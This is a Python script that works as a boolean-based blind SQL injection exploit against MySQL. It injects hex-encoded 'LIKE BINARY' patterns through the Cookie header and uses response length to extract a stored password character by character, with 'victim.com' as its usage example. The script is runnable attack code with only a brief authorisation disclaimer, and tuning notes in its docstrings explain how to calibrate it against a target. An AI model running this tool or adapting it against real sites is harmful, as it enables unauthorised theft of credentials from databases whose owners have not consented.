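#!/usr/bin/env python3
# Blind SQL injection Exploit version 1.0
# Language: Python 3 (ported from the original Python 2.6 source; same CLI)
# Author: gamma95
"""Boolean-based blind SQL injection toy.

The tool recovers a string one character at a time.  Every probe is an
HTTP POST whose ``Cookie`` header carries a hex-encoded ``LIKE BINARY``
pattern (``user_id=0 and password like binary 0x...``); the target is
assumed to splice that cookie value straight into a MySQL query.  The
response body length is the oracle: a body of ``FALSE_PAGE_LENGTH`` bytes
means "no match", anything else means "match".

Things a user must know before trusting the output:

* The ``-sql`` argument (e.g. ``user()``) is NOT interpolated into the
  payload; it is only echoed in the final status line.  What is actually
  extracted is the ``password`` column of the row with ``user_id=0``.
* The ``-dbserver`` argument is validated but the payload syntax
  (``LIKE BINARY``, ``0x..`` string literals) is MySQL-specific.
* The length oracle is target-specific; calibrate ``FALSE_PAGE_LENGTH``
  against a known-false request before relying on results (dynamic pages
  break it).
* ``LIKE BINARY`` is case-sensitive, so characters outside ``CHARSET``
  (e.g. upper case, punctuation) end extraction early.

Only run this against systems you are authorised to test.
"""
import sys
import urllib.error
import urllib.parse
import urllib.request

__all__ = [
    "encodeurl",
    "check",
    "escape_like",
    "like_pattern_hex",
    "build_request",
    "send_probe",
    "page_is_true",
    "execute",
    "main",
]

BANNER = """
#######################################################################
# Blind SQL injection Toy: version 1.0                                #
# Coded by: gamma95 (Gamma95[at]gmail.com)                            #
# Language: Python (2.6)                                              #
#                                                                     #
#                                                                     #
#                                                                     #
# Usage: ./blind.py -url -sql -dbserver                               #
# EX: ./blind.py "http://victim.com/index.php?id=1" "user()" "mysql"  #
#######################################################################
"""

# Values the original script hard-coded inline; kept as module constants so a
# user can recalibrate them without editing the extraction loop.
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789_"  # candidate characters, tried in order
MAX_LENGTH = 9999                                   # upper bound on recovered string length
FALSE_PAGE_LENGTH = 1025                            # body length of a "condition false" page
TIMEOUT = 10.0                                      # seconds per probe (original had none)
SUPPORTED_DBMS = ("mysql", "mssql", "oracle")
USER_AGENT = (
    "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) "
    "Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6"
)
POST_FIELDS = {"username": "guest", "password": "guest"}
# The original sent a fixed ``Host: 50.57.51.240`` regardless of the URL.
# urllib derives Host from the URL; set this only when a vhost differs.
HOST_OVERRIDE = None
# The injection point.  ``{pattern}`` is the hex of ``<prefix><guess>%``.
COOKIE_TEMPLATE = "user_id=0 and password like binary 0x{pattern}"


def encodeurl(string):
    """Return *string* with spaces percent-encoded.

    Only ``' '`` is touched (the original behaviour); other reserved
    characters are passed through unchanged.
    """
    return string.replace(" ", "%20")


def check(url):
    """Placeholder vulnerability probe.

    Always returns True, so the "Not vul" branch in :func:`main` is never
    taken.  A real implementation would send a known-true / known-false
    pair and compare the responses.
    """
    return True


def escape_like(text):
    """Escape MySQL ``LIKE`` metacharacters so *text* matches literally.

    Without this an ``_`` guess acts as a single-character wildcard and
    matches ANY next character, so every character outside ``CHARSET``
    was silently recorded as ``_`` by the original loop.
    """
    return text.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def like_pattern_hex(prefix, guess):
    """Hex-encode the pattern ``<prefix><guess>%`` for a ``0x...`` literal.

    Args:
        prefix: characters already recovered (unescaped).
        guess: the single candidate character being tested.

    Returns:
        Lower-case hex string, trailing ``25`` being the ``%`` wildcard.
    """
    literal = escape_like(prefix + guess)
    return literal.encode("utf-8").hex() + "25"


def build_request(url, prefix, guess):
    """Build the probe request for one candidate character.

    The URL itself is sent unchanged (apart from space encoding); the
    payload lives entirely in the ``Cookie`` header.  The POST body is the
    fixed guest/guest login form the original script used.
    """
    headers = {
        "User-Agent": USER_AGENT,
        "Referer": url,
        "Connection": "keep-alive",
        "Cookie": COOKIE_TEMPLATE.format(pattern=like_pattern_hex(prefix, guess)),
    }
    if HOST_OVERRIDE:
        headers["Host"] = HOST_OVERRIDE
    body = urllib.parse.urlencode(POST_FIELDS).encode("ascii")
    return urllib.request.Request(encodeurl(url), data=body, headers=headers)


def send_probe(request):
    """Send *request* and return the response body length in bytes.

    Any transport or HTTP error aborts the run with ``[+] Connection error``
    (the original swallowed everything with a bare ``except`` and exited);
    ``urllib.error.URLError`` and ``socket.timeout`` are both ``OSError``.
    """
    try:
        with urllib.request.urlopen(request, timeout=TIMEOUT) as response:
            return len(response.read())
    except OSError:
        print("[+] Connection error")
        sys.exit(1)


def page_is_true(page_length):
    """Length oracle: anything other than FALSE_PAGE_LENGTH counts as a match."""
    return page_length != FALSE_PAGE_LENGTH


def execute(url, sql, sqlserver):
    """Recover the target string character by character.

    Args:
        url: page to POST to; also sent as ``Referer``.
        sql: label printed in the final status line (not used in the payload).
        sqlserver: one of ``SUPPORTED_DBMS``; the payload is MySQL-specific,
            so anything else only gets a warning.

    Returns:
        The recovered string.  Extraction stops when no character in
        ``CHARSET`` matches (taken as end of string) or after MAX_LENGTH.

    Exits via ``sys.exit`` on bad ``sqlserver`` or on a connection error.
    """
    if sqlserver not in SUPPORTED_DBMS:
        # The original message said argv[4]; the DBMS is the third argument.
        print("[+] argv[3] = mysql, mssql or oracle !!! Plz check your input")
        sys.exit(1)
    if sqlserver != "mysql":
        print("[!] Warning: the cookie payload uses MySQL-only syntax "
              "(LIKE BINARY, 0x literals); results on " + sqlserver +
              " are unlikely to be meaningful")

    result = ""
    count = 0
    for _position in range(1, MAX_LENGTH):
        matched = None
        for guess in CHARSET:
            count += 1
            if page_is_true(send_probe(build_request(url, result, guess))):
                matched = guess
                break
        if matched is None:
            # No candidate matched: either end of string or a character
            # outside CHARSET (e.g. upper case) — see module docstring.
            break
        result += matched
        print(result)

    print("[+] Numbers of request: " + str(count))
    print("[+] Done !!! Result: " + sql + " = " + result)
    return result


def main(argv=None):
    """CLI entry point: ``blind.py URL SQL DBSERVER``.

    Args:
        argv: argument list without the program name; defaults to
            ``sys.argv[1:]``.
    """
    args = sys.argv[1:] if argv is None else list(argv)
    print(BANNER)
    if len(args) != 3:
        print("[+] Syntax Error")
        sys.exit(1)
    url, sql, sqlserver = args

    if check(url):
        print("""
[+] Sending Malicious Request
[+] Plz wait ... :)
""")
        execute(url, sql, sqlserver)
    else:
        print("Not vul")
        sys.exit(1)


if __name__ == "__main__":
    main()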